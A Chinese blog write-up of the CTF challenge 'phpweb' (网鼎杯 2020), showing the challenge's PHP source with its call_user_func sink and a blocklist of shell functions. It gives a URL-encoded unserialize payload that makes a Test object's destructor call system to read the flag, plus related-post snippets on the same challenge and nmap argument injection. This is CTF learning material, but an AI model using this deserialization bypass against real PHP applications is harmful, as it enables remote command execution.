[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2025-12-26 18:05:26 发布
原创 最新推荐文章于 2025-12-26 18:05:26 发布 · 141 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文讲述了如何在PHP中通过序列化绕过禁止的函数列表,实现对'系统'函数的间接调用,以解决实际问题的过程。

每天一题,记录学习

在这里插入图片描述
在这里插入图片描述
猜测这里大概是调用了date() 函数,抓包看看,和猜测是一样的
在这里插入图片描述
那么接下来就好办了,前面是函数,后面是参数
读个文件看看
在这里插入图片描述

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

和想的一样,这里有call_user_func($func, $p);,但是禁用了很多很多的函数,不能够直接读取 flag
但可以利用 serialize 来序列化绕过对函数的检测
在这里插入图片描述

payload
func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A30%3A%22tac+..%2F..%2F..%2Ftmp%2Fflagoefiu4r93%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

······
这道题的思路还是比较清楚的,就是直接使用函数不行,但可以通过反序列化来达到执行函数的目的

2020朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4356
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.youkuaiyun.com/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 6249
[RCTF2015]EasySQL 这道题没有什么思路,就是看上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
[ 2020 朱雀]phpweb 待续
zxnimud5的专栏
09-13 674
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
[ 2020 朱雀]phpweb 1
m0_62879498的博客
05-04 4634
[ 2020 朱雀]phpweb 1 在这里,我们查看源码 发现页面回显一直在变 抓包,查看能否得到更多的信息 发现index.php用post方式提交了两个参数,func和p 我们尝试猜测这两个参数的关系,可以用最简单的 php函数 MD5 来进行检测 发先页面回显的内容就是MD5加密后的123 尝试 直接查看站页面看能否成功 system被过滤掉了。 这里我们需要查看页面源代码,进行代码审计 在这里我们可以使用多种函数进行查看 例如:file_get_contents、highli
BUUCTF—[ 2020 朱雀]phpweb
2301_76227305的博客
09-04 1096
主要涉及的知识是反序列的运用,要懂得构造出序列化的数据,还得想到用file_get_contents函数读取源码。
[ 2020 朱雀]phpweb 详细题解(反序列化绕过命令执行)
weixin_73904941的博客
11-26 2329
观察代码发现Test类还没有用到,对于Test类,代码中没有调用的操作,作用是赋值$func 和 $p 的值并且调用gettime()函数 注意类中的__destruct()函数,如果利用unserialize()函数反序列化一个Test类,在类里的参数中写入要执行的代码和函数,此时$disable_fun不会匹配unserialize函数,就会执行gettime函数,调用call_user_func($func, $p);执行反序列化操作 __destruct()函数会在反序列化函数执行完之后触发
[ 2020 朱雀]之phpweb
snowlyzz的博客
05-10 1300
打开页面: 还以为是csgo里的JAME呢,没想到是孙笑川。。。 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm 这里提交了两个值,一个是func 值是date 另一个是p 值是 Y-m-d h:i:s 猜想一下,如果func的值是 system ,p的值是ls /flag呢? 可以先用md5来校验一下是否能够成功执行 ...
[ 2020 朱雀]之phpweb两种不同的解题方式
sGanYu
10-21 9137
目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且页每隔一段时间会刷新一次,频率大概五秒一次 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm .
2020朱雀_PHPweb
ro4lsc的博客
05-17 2549
前言 BUU上看到可以复现,那么按耐不住内心的我就开始肝。 进入主页 纳尼,这是个什么玩意。过了几秒 话不多说,查看源码 传递两个参数,func和p,抓包看看 如果我记得不错date应该是个函数,而p的值应该是date的参数,查查php手册 也就是说,这里可能可以执行php函数,那么首先肯定是要试试eval了 实锤可以执行了,但是这里肯定是有过滤的,怎么办呢?先试试读index.php的源码把 试试file_get_contents() 那么 <?php $disable_fu
2020 朱雀]phpweb 1(回调函数)
weixin_45577185的博客
09-06 216
抓个包 func是一个函数名,而p是一个参数,所以可以猜测用func来执行p func=highlight_file&p=index.php 得到index.php的源码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapes.
靠这套内DNS解决“IPv6优先级高+动态IPv6白名单配置繁琐+域名商IPv6不能关”的访问死局
最新发布
weixin_66855479的博客
12-26 942
前言:不少企业会碰到这样的拧巴络场景:只有一个`固定IPv4已加入域名IP白名单`,但IPv6是动态地址(每次变更需重新配置白名单,操作繁琐),因此未将IPv6加入白名单;更棘手的是——域名商后台的“IPv6兼容性”开关必须保持开启(业务要求无法关闭),哪怕终端能正常访问的只有固定IPv4,仍会优先发起IPv6请求,而这些动态IPv6不在白名单内会被拦截,最终导致业务域名频繁超时、无法访问。同时还叠加了这些痛点:CDN节点IP频繁变更需要手动改解析、公DNS存在劫持风险、多分支跨访问延迟高。最终选择搭
CRMEB-PHP商品分类系统开发指南:多级分类、批量管理与SEO优化
开源世界
12-23 232
若添加的是一级分类,则此处选择【顶级分类】;若添加的是二级分类,则此处选择对应一级分类名称。Git仓库:https://gitee.com/ZhongBangKeJi/CRMEB。可通过商品分类,分类状态(是否显示),分类名称查询商品分类信息。【小程序—分类】页面,一级分类下的【全部商品】显示的图标。可对商品分类信息执行添加,编辑,删除,查询操作;分类大图显示在pc首页,点击大图进入分类页面。小程序、APP各二级分类的图标。商品—>商品分类—>添加分类。
使用 Laravel Workflow 作为 MCP 工具提供给 AI 客户端
qq_31470439的博客
12-23 939
摘要 本文介绍了如何将 Laravel Workflow 作为 MCP(Model Context Protocol)工具提供给 AI 客户端使用。MCP 正成为 AI 助手与外部服务交互的标准方式。通过 Laravel MCP,开发者可以将工作流暴露为可调用工具,使 AI 客户端能够发现、调用和监控这些工具。 文章详细说明了如何构建 MCP 服务器,使 AI 客户端能够: 发现可用工作流 异步启动工作流 轮询状态并获取结果 这种合模式特别适合需要长时间运行的复杂任务,让 AI 代理可以编排持久化工作流,
3572827
2501_91992196的博客
12-24 92
注意的是,如果是特殊符号,他不会那个,但是*号前面的东西他都会看做空变量。他知道命令执行代码原来是这样的意思,直接用环境变量,py输出到Cmd。我的天异或运算,直接用异或拼接,他一个一个对应拼接还是什么?这个我知道,将目录下的文件写入一个shell脚本中。输出的控制台解码,然后查询Flag。这个其实某种意义上和上面不一样。也就是说他还是执行了的。可以直接执行命令执行。有些必须有输出才行。这个斜杠是没有事的。这个是命令执行漏洞。
AUTOSAR图解==>AUTOSAR_AP_SWS_NetworkManagement
一名留德华的,康德的信徒的,专注于汽车电子领域的博客
12-24 25
本文深入解析AUTOSAR自适应平台络管理规范R24-11版本,详细介绍了其架构设计与核心功能。该规范采用分层架构设计,通过逻辑络句柄(NetworkHandle)协调ECU间的络通信,实现络状态管理、部分络控制(PNC)和分布式协调算法。关键内容包括:络管理的三大核心职责(协调休眠、唤醒管理、逻辑抽象);四层架构设计(应用层、功能簇层、通信层和硬件层);以及络句柄与物理通道的多级映射关系。文档还提供了状态机、API接口和配置参数等关键技术细节,为汽车电子络通信提供了标准化解决方案。
仓颉语言中异常处理入门的深度剖析与工程实践
超哥的博客
12-22 458
本文探讨了仓颉语言中的异常处理机制,将其与C、Go、Java等语言的错误处理方式进行了对比。仓颉的异常处理体系基于类型安全和资源管理,强制开发者显式处理错误。文章详细分析了异常的本质与传播机制,包括栈展开过程和RAII模式,并比较了异常与Result类型两种错误处理范式的适用场景。通过数据库连接池与事务管理的实践案例,展示了自定义异常设计、try-catch-finally模式以及事务操作中的异常处理最佳实践。仓颉的异常处理机制在简化代码流程与保证错误处理显式性之间取得了平衡,适合构建健壮的应用程序。
路由策略优化基本思路和方法
HXKF123的博客
12-24 941
本文系统介绍了路由策略优化的核心目标、流程和实施方法。主要内容包括:1)优化目标:提升转发效率、优化资源利用、保障业务可靠、增强络安全和简化运维管理;2)五步核心流程:需求分析→现状评估→方案设计→实施验证→持续优化;3)典型优化策略:选路优化、流量分流、路由过滤、冗余备份和安全隔离;4)实施要点:精准匹配规则设计、分阶段实施和风险控制;5)常见问题排查方法。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值